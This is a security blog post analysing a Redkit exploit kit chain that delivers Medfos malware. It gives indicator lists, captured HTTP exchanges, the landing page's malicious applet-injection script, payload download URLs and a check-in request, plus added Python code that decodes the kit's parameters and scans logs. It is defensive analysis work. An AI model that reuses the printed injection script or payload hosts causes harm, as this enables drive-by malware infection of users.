Friday, December 7, 2012

Redkit, Medfos URL Detection, With Drop Points

Here's another less publicized exploit kit, with some interesting URLs, that drops Troj/Medfos variants. I've only just started on this one, but it was interesting enough for me to share as I go.

Exploit URL Pattern:

/count17.php
/hmiq.htm
/887.jar
/332.jar
/c.htm
/newavr5.exe

/app/geoip.js
/soft4.exe
/soft3.exe

Drop points:

dangerstriangle.info
91.238.83.56
78.140.131.158/upload/fid=
megaupload.com/upload/fid=
POST /tmp2/index.php


Sophos analysis of Troj/Medfos-BI:
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Medfos-BI/detailed-analysis.aspx


Known Hosters:

portafi.com

hxxp://vangoluekspresgazetesi.com/887.jar (IP 91.227.6.25)
hxxp://artindigonotecards.com/887.jar (IP 50.63.38.1)
hxxp://kouroupakis.gr/887.jar (IP 159.253.141.42)
hxxp://istambul.co/332.jar (IP 188.132.225.229)
hxxp://yourpartytoremember.com/332.jar (IP 216.65.69.244)

hxxp://neluzjiv.ru/newavr5.exe (IP 174.126.147.57)
hxxp://uwfekfyj.ru/newavr5.exe (IP 86.100.103.154)
hxxp://ystinqoc.ru/newavr5.exe (IP 89.149.84.250)
hxxp://mosjinme.ru/newavr5.exe (IP 62.73.102.121)
hxxp://mosjinme.ru/newavr5.exe (IP 1.169.98.97)
hxxp://pevhyvys.ru/newavr5.exe (IP 89.147.116.106)
hxxp://niliqrix.ru/newavr5.exe (IP 70.75.89.14)
hxxp://wetifjam.ru/newavr5.exe (IP 76.108.174.97)
hxxp://lupylzum.ru/newavr5.exe (IP 37.229.17.6)
hxxp://votqygiq.ru/newavr5.exe (IP 189.55.48.176)
hxxp://niliqrix.ru/newavr5.exe (IP 176.226.169.105)
hxxp://wetifjam.ru/newavr5.exe (IP 46.36.139.253)

http://jsunpack.jeek.org/?report=7ceaf78be0bab306c12d2217137ca1991aee92fb
Entry point in this case: /count17.php, hosted on 50.8.225.255 (tahfifak.ru).


GET /count17.php HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://www.tuvalclima.com/tuberias.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: tahfifak.ru
Connection: Keep-Alive

HTTP/1.1 302 
Server: Apache
Content-Length: 0
Content-Type: 
Last-Modified: .., 02 ... 2012 22:52:20 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 02 Dec 2012 22:52:41 GMT
X-Powered-By:PHP/5.3.2
Location:http://bulow-duus.dk/hmiq.html


Wonderful, redirect to hmiq.html

GET /hmiq.htm HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://www.tuvalclima.com/tuberias.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: portafi.com



HTTP/1.1 200 OK
Date: Sun, 02 Dec 2012 22:52:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Refresh: 12; URL=http://syenial.com/links/1.php
Content-Length: 12938
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html

<html><body><td>Anona th she i vo doth dode hasme smevo has dedo she s an demeun.</td><script type="text/javascript">document.write('<applet archive="http://portafi.com/332.jar" code="Runs.class"><param name="elitken" value="lvmomiingm0domiingtvromiingh9bomiing.f6omiing3lhomiing3v0omiing/0xomiingmh2omiingo4xomiingc6lomiing.4qomiingi2aomiingfzfomiinga0momiingtdqomiingr2homiingofsomiingplbomiing/z8omiing/lxomiing:i9omiingprgomiingt3womiingt6romiingh2pomiing"></applet>');document.write('<applet archive="http://portafi.com/887.jar" code="Runs.class"><param name="elitken" value="l20omiingml1omiingt9homiinghboomiing.ydomiing141omiing4lbomiing/yhomiingmf6omiingo81omiingc9yomiing.aeomiingicyomiingfp0omiingac8omiingtbbomiingr2eomiingoztomiingpt9omiing/v8omiing/12omiing:deomiingp51omiingtgpomiingt9gomiingh03omiing"></applet>');.    var xcioior=document.createElement("iframe");

Interesting, because this looks extremely similar to Blackhole 2.0's method of passing a param name= along with a following value=. The notable part here is that the kit references the jars directly.

So as quickly as my system can, it runs to get those files, both of them.
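The two elitken values above are worth decoding, since they tell the applet where to go next. This is an added example, not code from the post or from the kit: it strips the repeated "omiing" separator, keeps the first character of each three-character chunk and reverses the result. That scheme is my reading of the two values on this page, not a documented Redkit format, and the constant names, the regex and the stand-alone landing-page fragment (copied from the hmiq.htm response above) are mine.

```python
import re

# Redkit's applet tags carry the next-stage URL in the 'elitken' parameter.
# On the two values in this post the encoding is: 3-character chunks joined by
# the literal "omiing"; only the first character of each chunk is real, the
# other two are filler; the real characters spell the URL backwards.
# This is an inference from the two samples, not a published spec.
SEPARATOR = "omiing"
CHUNK_LEN = 3

# The two parameter values exactly as they appear in the hmiq.htm response.
VALUE_332 = ("lvmomiingm0domiingtvromiingh9bomiing.f6omiing3lhomiing3v0omiing/0xomiing"
             "mh2omiingo4xomiingc6lomiing.4qomiingi2aomiingfzfomiinga0momiingtdqomiing"
             "r2homiingofsomiingplbomiing/z8omiing/lxomiing:i9omiingprgomiingt3womiing"
             "t6romiingh2pomiing")
VALUE_887 = ("l20omiingml1omiingt9homiinghboomiing.ydomiing141omiing4lbomiing/yhomiing"
             "mf6omiingo81omiingc9yomiing.aeomiingicyomiingfp0omiingac8omiingtbbomiing"
             "r2eomiingoztomiingpt9omiing/v8omiing/12omiing:deomiingp51omiingtgpomiing"
             "t9gomiingh03omiing")


def decode_elitken(value: str, sep: str = SEPARATOR) -> str:
    """Return the URL hidden in one 'elitken' parameter value."""
    if sep not in value:
        raise ValueError("separator not found; value is not in the expected encoding")
    chunks = [c for c in value.split(sep) if c]           # drop the empty tail
    bad = [c for c in chunks if len(c) != CHUNK_LEN]
    if bad:
        raise ValueError(f"unexpected chunk(s) {bad!r}; encoding may differ")
    return "".join(c[0] for c in chunks)[::-1]


# One <applet ...> tag followed by its elitken <param>. The landing page wraps
# the tags in document.write(), which the regex does not need to care about.
APPLET_RE = re.compile(
    r'<applet[^>]*\barchive="([^"]+)"[^>]*>\s*<param\s+name="elitken"\s+value="([^"]+)"',
    re.IGNORECASE,
)


def extract_applets(html: str) -> list[tuple[str, str]]:
    """Return (jar_url, decoded_next_stage_url) for each applet in a landing page."""
    return [(jar, decode_elitken(val)) for jar, val in APPLET_RE.findall(html)]


# Landing-page fragment rebuilt from the hmiq.htm response shown in the post
# (a constructed test input; line breaks added between the two writes).
LANDING = f"""<script type="text/javascript">
document.write('<applet archive="http://portafi.com/332.jar" code="Runs.class"><param name="elitken" value="{VALUE_332}"></applet>');
document.write('<applet archive="http://portafi.com/887.jar" code="Runs.class"><param name="elitken" value="{VALUE_887}"></applet>');
</script>"""


if __name__ == "__main__":
    for jar, target in extract_applets(LANDING):
        print(f"{jar} -> applet is told to fetch {target}")
```

Run as a script it prints each jar URL beside the page the applet is told to fetch; on the two values here both decode to pages on the same host that serves the jars, which is a useful confirmation when you are deciding whether a landing page belongs to this kit. The chunk-length check is there so a value that uses a different filler pattern fails loudly instead of decoding into garbage.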

GET /887.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: portafi.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

What happens next is fun. My system makes a GET request for c.htm twice. The first response is a binary; the second one is not.

GET /c.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
Host: deportivistasbrigantium.com
Cache-Control: no-cache


And here is the response:


HTTP/1.1 200 OK
Date: Sun, 02 Dec 2012 22:52:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=1.exe
Content-Length: 41984
Content-Type: application/octet-stream

.............W..T..........................................................L..Th%. p..gr.. c..no..be..un..n ..S ..de..

........1..)e..ze..zU..z...z...z...zN..z..Cz...z...z...z...z...z..chu.




GET /c.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
Host: deportivistasbrigantium.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 02 Dec 2012 22:53:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 123
Content-Type: text/html

..6........6...p;..2oS_
."..*(.R.`]....7...'..k......W..[..&.uX..Bk..4lI..D.%_.t?6q9...|.........R.....E.erZ5:v{..
.I.....,


And the sleigh ride continues...
No referrer, no user agent: a down-and-dirty GET request.


GET /newavr5.exe HTTP/1.0
Host: otxolpow.ru


HTTP/1.1 200 
Server: Apache
Content-Length: 769536
Content-Type: 
Last-Modified: .., 02 ... 2012 22:52:58 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 02 Dec 2012 22:52:55 GMT
Last-Modified:Sun, 02 Dec 2012 22:30:45 GMT
Accept-Ranges:bytes

MZ......................@...................................|...........!..L.!..This program must be run under Win32

I'm not alone in my fun.



They want to know where I am:

GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close



HTTP/1.0 200 OK
Expires: Sun, 02 Dec 2012 23:22:57 GMT
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Content-Length: 512



function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city()         { return 'Funtown'; }
function geoip_region()       { return ''; }
function geoip_region_name()  { return ''; }
function geoip_latitude()     { return ''; }
function geoip_longitude()    { return ''; }
function geoip_postal_code()  { return ''; }
function geoip_area_code()    { return ''; }
function geoip_metro_code()   { return ''; }


Now... presumably posting some interesting data about my worthless system.



GET /upload/fid=BwCRAAEAP9gAAAEFCBcAAAAAAAAAAAAAAAAAAACQDAwBCwAAAM7PVN7iEdI8rLhxgiZvmW-K27tQAADBnDGDr58fgsdvmoWKlzES39DNAcB23-I_2AAAY3FwZmp4fXVkcmlocHoDBAUGAQITkSInJ26U9wAAAAAAAQcAAAAHAAAANFYA HTTP/1.1
Host: megaupload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cache-Control: no-cache
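Pulling the indicators from this walk-through into something that can be run over proxy records, as an added example that is not the post's own tooling: the record format (pipe-separated method, host, path, HTTP version, User-Agent, response Content-Type and Content-Disposition) is constructed for the example, the sample lines are built from the requests and responses shown above plus one benign line, and the \d generalisations of count17.php, the three-digit jar names and newavr5.exe are my assumption; the post only shows those literal names. The two behavioural rules (an .htm URL answered with an executable, and a bare HTTP/1.0 .exe fetch with no User-Agent) come straight from the c.htm and newavr5.exe exchanges.

```python
import re
from dataclasses import dataclass

# Paths of the Redkit -> Medfos chain as they appear in the post. The numeric
# parts are generalised with \d (an assumption: the post only shows
# count17.php, 887.jar, 332.jar and newavr5.exe).
CHAIN_PATHS = [
    (re.compile(r"^/count\d+\.php$"), "redkit-entry"),
    (re.compile(r"^/hmiq\.html?$"), "redkit-landing"),
    (re.compile(r"^/\d{3}\.jar$"), "redkit-jar"),
    (re.compile(r"^/c\.htm$"), "redkit-stage"),
    (re.compile(r"^/newavr\d\.exe$"), "medfos-payload"),
]
# Medfos check-in from the post: /upload/fid= followed by one long opaque token.
CHECKIN = re.compile(r"^/upload/fid=[A-Za-z0-9_-]{40,}$")


@dataclass
class Record:
    method: str
    host: str
    path: str
    version: str
    user_agent: str      # "-" when the request carried no User-Agent
    content_type: str    # response Content-Type, "-" when absent or empty
    disposition: str     # response Content-Disposition, "-" when absent


def parse_record(line: str) -> Record:
    """Parse one pipe-separated proxy record (a constructed format, not a real product's)."""
    fields = [f.strip() for f in line.split("|")]
    if len(fields) != 7:
        raise ValueError(f"expected 7 fields, got {len(fields)}: {line!r}")
    return Record(*fields)


def classify(rec: Record) -> list[str]:
    """Return the detection tags that apply to one record (empty list = nothing seen)."""
    tags = [tag for pattern, tag in CHAIN_PATHS if pattern.search(rec.path)]
    if CHECKIN.search(rec.path):
        tags.append("medfos-checkin")
    # A .htm/.html URL answered with an executable body, like the first c.htm hit.
    looks_like_page = re.search(r"\.html?$", rec.path, re.I) is not None
    if looks_like_page and (
        rec.content_type == "application/octet-stream"
        or re.search(r"filename=.*\.exe", rec.disposition, re.I)
    ):
        tags.append("exe-served-as-htm")
    # Bare HTTP/1.0 fetch of an .exe with no User-Agent at all, like newavr5.exe.
    if rec.path.lower().endswith(".exe") and rec.version == "HTTP/1.0" and rec.user_agent == "-":
        tags.append("bare-exe-download")
    return tags


def scan(lines) -> list[tuple[str, str, list[str]]]:
    """Return (host, path, tags) for every record that triggers at least one rule."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_record(line)
        tags = classify(rec)
        if tags:
            hits.append((rec.host, rec.path, tags))
    return hits


# Constructed records built from the requests and responses shown in the post,
# plus one benign line. Fields: method|host|path|version|user-agent|content-type|content-disposition
SAMPLE_LOG = [
    "GET|tahfifak.ru|/count17.php|HTTP/1.1|Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)|-|-",
    "GET|portafi.com|/hmiq.htm|HTTP/1.1|Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)|text/html|-",
    "GET|portafi.com|/887.jar|HTTP/1.1|Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29|application/x-java-archive|-",
    "GET|deportivistasbrigantium.com|/c.htm|HTTP/1.1|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2)|application/octet-stream|inline; filename=1.exe",
    "GET|otxolpow.ru|/newavr5.exe|HTTP/1.0|-|-|-",
    "GET|megaupload.com|/upload/fid=BwCRAAEAP9gAAAEFCBcAAAAAAAAAAAAAAAAAAACQDAwBCwAAAM7PVN7iEdI8rLhxgiZvmW-K27tQAADBnDGDr58fgsdvmoWKlzES39DNAcB23-I_2AAAY3FwZmp4fXVkcmlocHoDBAUGAQITkSInJ26U9wAAAAAAAQcAAAAHAAAANFYA|HTTP/1.1|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)|-|-",
    "GET|www.example.com|/index.html|HTTP/1.1|Mozilla/5.0|text/html|-",
]

if __name__ == "__main__":
    for host, path, tags in scan(SAMPLE_LOG):
        print(f"{host}{path[:40]:<42} {', '.join(tags)}")
```

The path rules are the cheap part and will age as the kit renames its files; the two behavioural rules are the ones worth keeping, since a page-looking URL that returns application/octet-stream or a filename=1.exe disposition, and a versionless, agentless .exe download, both stand out regardless of which domain the kit moves to next.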

2 comments:

  1. Hi! Some more payloads, here:

    h00p://sukbewli.ru/newavr5.exe Kazy https://www.virustotal.com/file/6bf444a638ed676bbaad4069c75b77b16358528ac20742f3b5aa36daf54c740d/analysis/
    h00p://neluzjiv.ru/newavr5.exe FakeAV https://www.virustotal.com/file/3a2194071ac42b56af6a09146472f05158fbff9543be183f7a84212dced522fb/analysis/
    h00p://rizsebym.ru/newavr3.exe FakeAV https://www.virustotal.com/file/50e7a2dcb26bfe2b984df9e15043e99fbd800247b6e86f08f5767334a1b23037/analysis/
    h00p://votqygiq.ru/newavr3.exe Klihos https://www.virustotal.com/file/e866ddd2bfa316692c5562141584f1c1399fe6ee8f8cca9687a7ff6794015ba9/analysis/
    h00p://nobzekyx.ru/newavr3.exe FakeAV https://www.virustotal.com/file/a5ab84baef7e9c8d0947dfdc5d0e67d488c20e88273c1891cff5ee1a580cf2d2/analysis/
    h00p://pevhyvys.ru/newavr3.exe Klihos https://www.virustotal.com/file/db76cdc7d9dd81b425d11d96fd60ed404617b3fb46eca18159bb17f0c7116205/analysis/
    h00p://sesuhror.ru/newavr3.exe Klihos https://www.virustotal.com/file/61fe2e7f2efeac0c503dce3b5afbfe67464fc76b0982c856f1795baf8527a54f/analysis/
